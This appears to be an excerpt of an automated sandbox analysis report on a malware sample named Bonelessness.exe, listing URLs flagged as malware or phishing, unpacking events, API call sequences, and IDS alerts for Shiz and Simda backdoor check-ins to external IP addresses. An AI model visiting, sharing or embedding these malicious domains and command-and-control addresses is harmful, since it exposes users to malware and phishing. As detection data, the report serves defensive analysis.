      Source: http://ww25.lyxynyx.com/login.php?subid1=20240824-0247-3858-b174-cdc5f33d229ccoAvira URL Cloud: Label: malware
      Source: http://gadyniw.com/login.phpAvira URL Cloud: Label: malware
      Source: http://pupydeq.com/login.phpAvira URL Cloud: Label: malware
      Source: http://lygyvuj.com/login.phpAvira URL Cloud: Label: phishing
      Source: http://gadyciz.com/login.phpAvira URL Cloud: Label: malware
      Source: http://galyqaz.com/Computerspiele.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4DAvira URL Cloud: Label: malware
      Source: http://ww3.galyqaz.com/Avira URL Cloud: Label: phishing
      Source: http://galyqaz.com/Networking_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaAvira URL Cloud: Label: malware
      Source: https://qegyhig.com//Avira URL Cloud: Label: malware
      Source: http://gadyniw.com/login.php3Avira URL Cloud: Label: malware
      Source: http://galyqaz.com/IT_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4DW2oAvira URL Cloud: Label: malware
      Source: http://www.gahyqah.com/login.phpPAvira URL Cloud: Label: malware
      Source: http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCAvira URL Cloud: Label: malware
      Source: http://gatyhub.com/login.phpAvira URL Cloud: Label: malware
      Source: http://lyvyxor.com/login.php_LAvira URL Cloud: Label: malware
      Source: http://ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181Avira URL Cloud: Label: malware
      Source: https://lysyvan.com/Avira URL Cloud: Label: malware
      Source: http://ww25.lyxynyx.com/login.php?subid1=20240824-0247-3858-b174-cdc5f33d229cAvira URL Cloud: Label: malware
      Source: https://lysyvan.com/wp-json/Avira URL Cloud: Label: malware
      Source: http://qegyhig.com/login.phpAppDataAvira URL Cloud: Label: malware
      Source: http://lysyfyj.com/login.phpAvira URL Cloud: Label: malware
      Source: http://galyqaz.com/Search_Engine_Ranking.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52Avira URL Cloud: Label: malware
      Source: http://vocyzit.com/login.phpAvira URL Cloud: Label: malware
      Source: http://galyqaz.com/login.phpAvira URL Cloud: Label: malware
      Source: http://www.gahyqah.com/login.phpAvira URL Cloud: Label: malware
      Source: https://qegyhig.com/wp-json/Avira URL Cloud: Label: malware
      Source: http://gatyfus.com/login.phpd%Avira URL Cloud: Label: malware
      Source: http://gatyfus.com/login.phpAvira URL Cloud: Label: malware
      Source: http://galyqaz.com/login.php0Avira URL Cloud: Label: malware
      Source: https://qegyhig.com/login.phpAvira URL Cloud: Label: malware
      Source: https://qegyhig.com/Avira URL Cloud: Label: malware
      Source: http://lysyvan.com/login.phpAvira URL Cloud: Label: malware
      Source: http://ww16.vofycot.com/login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7Avira URL Cloud: Label: malware
      Source: http://qetyfuv.com/login.phpAvira URL Cloud: Label: malware
      Source: http://qexyhuv.com/login.phpAvira URL Cloud: Label: malware
      Source: http://vonypom.com/login.phpAvira URL Cloud: Label: malware
      Source: http://pupycag.com/login.phpAvira URL Cloud: Label: phishing
      Source: http://vofycot.com/login.phpAvira URL Cloud: Label: malware
      Source: http://ww16.vofycot.com/login.php?sub1=20240824-0247-3846-ad61-5b1f45bc95f4Avira URL Cloud: Label: malware
      Source: https://qegyhig.com/login.phpgpage.namecheap.com;::ffff:91.195.240.19;Avira URL Cloud: Label: malware
      Source: http://galyqaz.com/Personals.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4DW2oyVAvira URL Cloud: Label: malware
      Source: http://ww3.galyqaz.com/DigiCertAvira URL Cloud: Label: phishing
      Source: http://ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181coAvira URL Cloud: Label: malware
      Source: https://qegyhig.com/m/Avira URL Cloud: Label: malware
      Source: https://lysyvan.com/login.phpAvira URL Cloud: Label: malware
      Source: http://gadyniw.com/login.php/Avira URL Cloud: Label: malware
      Source: http://qegyhig.com/login.phpAvira URL Cloud: Label: malware
      Source: Bonelessness.exeReversingLabs: Detection: 95%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
      Source: Bonelessness.exeJoe Sandbox ML: detected

      Compliance

      barindex
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeUnpacked PE file: 5.2.JbrLYfXaOpqnSngA.exe.2890000.3.unpack
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeUnpacked PE file: 6.2.JbrLYfXaOpqnSngA.exe.2440000.3.unpack
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeUnpacked PE file: 21.2.JbrLYfXaOpqnSngA.exe.2440000.3.unpack
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeUnpacked PE file: 35.2.JbrLYfXaOpqnSngA.exe.3290000.3.unpack
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeUnpacked PE file: 39.2.JbrLYfXaOpqnSngA.exe.2940000.3.unpack
      Source: C:\Users\user\Desktop\Bonelessness.exeUnpacked PE file: 0.2.Bonelessness.exe.400000.1.unpack
      Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 1.2.svchost.exe.400000.1.unpack
      Source: Bonelessness.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49654 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49661 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:51114 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:51121 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:64278 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:64286 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:64293 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:64296 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:56397 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:56400 version: TLS 1.2
      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JbrLYfXaOpqnSngA.exe, 00000005.00000000.2010181534.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000006.00000002.2204828700.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000008.00000000.2011823970.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2205428505.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000010.00000002.2045473414.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000013.00000000.2033627529.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000015.00000000.2049314885.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000017.00000000.2052075922.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000019.00000000.2055014446.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 0000001B.00000000.2059375961.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 0000001D.00000000.2060402527.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 0000001F.00000000.2072104638.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000021.00000002.2079267989.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000023.00000000.2077051462.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000025.00000000.2081215028.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089000932.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D3E1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,1_2_02D3E1B0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D4D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,1_2_02D4D638
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D49460 PathFileExistsA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,1_2_02D49460
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D3CC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,1_2_02D3CC10
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D27400 PathFileExistsA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,1_2_02D27400
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D4D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,1_2_02D4D5A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028AE1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_028AE1B0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028BD638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,5_2_028BD638
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_02897400 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_02897400
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028ACC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_028ACC10
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028B9460 PathFileExistsA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_028B9460
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028BD5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,5_2_028BD5A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0245E1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0245E1B0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0246D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,6_2_0246D638
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_02469460 PathFileExistsA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_02469460
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_02447400 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_02447400
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0245CC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0245CC10
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0246D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,6_2_0246D5A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_00E16B1C FindFirstFileExW,8_2_00E16B1C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012FE1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,8_2_012FE1B0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_0130D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,8_2_0130D5A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012E7400 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,8_2_012E7400
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012FCC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,8_2_012FCC10
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_01309460 Sleep,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,8_2_01309460
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_0130D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,8_2_0130D638
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D3D060 StrStrIA,memset,memset,SetErrorMode,SetErrorMode,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,PathAddBackslashA,SetErrorMode,1_2_02D3D060

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49735 -> 3.64.163.50:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49658 -> 5.79.71.225:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49663 -> 188.114.97.3:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49662 -> 13.248.169.48:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49662 -> 13.248.169.48:80
      Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:53971
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49663 -> 188.114.97.3:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49736 -> 199.191.50.83:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49736 -> 199.191.50.83:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:51111 -> 18.208.156.248:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:60209 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49735 -> 3.64.163.50:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49658 -> 5.79.71.225:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:51129 -> 103.224.212.210:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51129 -> 103.224.212.210:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49655 -> 69.162.80.60:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49651 -> 18.208.156.248:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49651 -> 18.208.156.248:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51111 -> 18.208.156.248:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49731 -> 188.114.96.3:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49731 -> 188.114.96.3:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:60209 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.4:49651
      Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:53004
      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.4:60209
      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.4:60209
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49655 -> 69.162.80.60:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49653 -> 172.234.222.143:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49653 -> 172.234.222.143:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49733 -> 208.100.26.245:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49733 -> 208.100.26.245:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:51128 -> 103.224.182.252:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51128 -> 103.224.182.252:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49732 -> 162.255.119.102:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49657 -> 172.234.222.143:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49732 -> 162.255.119.102:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49657 -> 172.234.222.143:80
      Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:63402
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:51125 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49734 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49734 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.4:49651
